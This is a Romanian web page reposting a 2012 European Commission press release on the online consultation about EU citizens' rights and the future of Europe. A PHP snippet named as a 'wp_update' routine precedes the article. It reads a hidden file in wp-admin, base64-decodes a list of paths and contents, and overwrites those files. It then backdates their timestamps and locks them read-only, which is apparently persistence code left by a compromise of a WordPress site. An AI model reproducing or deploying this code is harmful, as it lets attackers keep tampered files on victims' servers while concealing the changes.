$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Au mai rămas 10 zile până la încheierea consultării pe tema viitorului Europei – O noua atitudine

După cum reiese din ultimele cifre date astăzi publicității, peste 8404 de cetățeni ai UE s­au exprimat deja cu privire la viitorul Europei, prin participarea la ampla consultare online lansată de Comisia Europeană pe tema drepturilor cetățenilor și pe cea a viitorului Europei. La 9 mai, dată la care se sărbătorește Ziua Europei, Comisia Europeană a invitat cetățenii europeni să contribuie la stabilirea agendei politice pentru anii următori și la conturarea viitorului Europei (IP/12/461). Cap de afiș sunt propunerile de „uniune politică”, de „Federație Europeană” sau de „State Unite ale Europei”. Această chestiune importantă cu privire la viitorul Uniunii Europene nu trebuie să fie dezbătută doar de către politicieni, ci și de către cetățeni. Europenii mai au zece zile pentru a-și exprima părerea cu privire la întrebări precum „În ce direcție ați dori să se îndrepte Uniunea Europeană în viitorul apropiat? Cum arată Uniunea Europeană în care ați dori să trăiți în 2020?”. Consultarea se încheie la 9 septembrie.

„Într-un moment în care dezbaterea politică în Europa este ațintită spre viitor și spre diferitele mijloace de realizare a unei veritabile uniuni politice, economice și monetare, este important să se ofere cetățenilor posibilitatea de a participa la propriul lor viitor. Această consultare constituie pentru cetățenii europeni un prilej de a contribui la conturarea agendei UE, în ceea ce privește drepturile lor concrete în calitate de cetățeni ai UE și, pe un plan mai general, direcția în care doresc ca UE să se angajeze pe viitor”, a declarat doamna Viviane Reding, vicepreședinte al Comisiei Europene și comisar al UE pentru justiție, drepturi fundamentale și cetățenie. „Pentru a ieși din criză, avem mai mult, și nu mai puțin nevoie de Europa. În acest sens, este necesar să cunoaștem opinia cetățenilor noștri. La urma urmei, esența Europei constă în drepturile, preocupările și viitorul lor. Prin urmare, cetățenii sunt cei care ar trebui să ne ghideze în drumul nostru spre o Europă mai puternică și mai integrată.”

În consultarea lansată de Comisie „Drepturile dumneavoastră, viitorul dumneavoastră” cetățenii sunt întrebați, de asemenea, care sunt obstacolele efective pe care le întâlnesc în viața lor de zi cu zi atunci când își exercită drepturile în calitate de cetățeni ai UE sau atunci când doresc să se bazeze pe drepturile fundamentale consacrate în dreptul UE. Comisia dorește să afle care sunt dificultățile pe care le întâmpină europenii atunci când călătoresc în Europa, când se mută în străinătate, când votează sau când candidează la alegeri ori atunci când efectuează cumpărături online.

Răspunsurile primite în urma consultării vor fi utilizate direct în agenda politică a Comisiei pentru următorii ani și vor constitui baza pentru Raportul din 2013 privind cetățenia UE, care urmează să fie prezentat la 9 mai 2013, cu ocazia Zilei Europei de anul viitor. În urma unei propuneri a Comisiei, s-a stabilit ca 2013 să fie desemnat drept „Anul european al cetățenilor” (IP/11/959). Aceasta va fi o ocazie de a dezbate direct cu cetățenii din statele membre în cadrul așa­numitelor „dialoguri cu cetățenii”. Primul astfel de dialog este prevăzut să aibă loc la data de 27 septembrie la Cadiz.
Primul raport privind cetățenia UE, cel din 2010, a scos în evidență 25 de acțiuni concrete (a se vedea IP/10/1390 și MEMO/10/525) menite să îndepărteze obstacolele pe care le întâmpină cetățenii UE în exercitarea drepturilor lor în UE. De atunci, Comisia a depus eforturi pentru a-și respecta promisiunile, de exemplu, prin consolidarea drepturilor victimelor infracționalității, prin reducerea birocrației pentru persoanele care își înmatriculează autoturismul într-o altă țară a UE, prin interzicerea comisioanelor suplimentare pentru plățile efectuate cu cărți de credit și a opțiunilor predefinite pentru a proteja persoanele care efectuează cumpărături online, precum și prin consolidarea dreptului la un proces echitabil pentru toți cetățenii UE.

La doar trei luni de la data de 9 mai, când a fost lansată consultarea pe tema viitorului Europei, peste 8404 de persoane participaseră deja la aceasta, răspunzând la chestionarul online. Este vorba de cetățeni din toate statele membre (9,9 % din respondenți sunt francezi, 9,2 % – germani, 8,9 % – italieni, 7,6 % – spanioli și 8,5 % – polonezi; în anexă puteți vedea care este procentul de cetățeni din țara dumneavoastră care au participat la consultare).

Chestionarul este scurt și poate fi completat ușor online, necesitând doar 10 minute din timpul dumneavoastră. Consultarea va fi deschisă până la 9 septembrie: http://ec.europa.eu/justice/opinion/your-rights-your-future/index_ro.htm

 

Context

Datorită cetățeniei UE – care nu înlocuiește cetățenia națională, ci o completează – toți resortisanții celor 27 de state membre ale UE beneficiază de un set de drepturi suplimentare în calitate de cetățeni ai UE. Printre acestea se numără dreptul de a vota și de a candida la alegerile locale și europene în țara din UE în care locuiesc, dreptul la protecție consulară în străinătate în aceleași condiții ca și cele aplicate cetățenilor țării în cauză, precum și dreptul de a adresa petiții Parlamentului European, de a înainta o plângere Ombudsmanului European sau de a lua parte la o inițiativă cetățenească europeană. În plus, orice persoană care locuiește în Europa își poate exercita drepturile fundamentale prevăzute în Carta drepturilor fundamentale a UE ori de câte ori legislația UE este aplicată de instituțiile UE sau este pusă în aplicare de către autoritățile naționale.

Raportul din 2010 privind cetățenia UE a scos în evidență 25 de măsuri concrete menite să îndepărteze obstacolele existente în calea cetățenilor europeni în ceea ce privește dreptul acestora la libera circulație în UE. Una dintre acestea vizează creșterea gradului de informare a persoanelor în ceea ce privește statutul lor de cetățeni ai UE, drepturile de care beneficiază și modul în care aceste drepturi se concretizează în viața lor de zi cu zi. Prin urmare, Comisia a propus desemnarea anului 2013 drept „Anul european al cetățenilor” și organizarea, pe parcursul întregului an, a unor evenimente specifice privind cetățenia Uniunii și politicile referitoare la cetățeni.

 

A.N.P.C.P.P.S.Romania – o9atitudine ! – InfoCons, unica organizatie din Romania cu drepturi depline in Consumers International, membra fondatoare a Federatiei Asociatiilor de Consumatori.

Sursa: Comisia Europeana

Bruxelles, 31 august 2012

By o9admin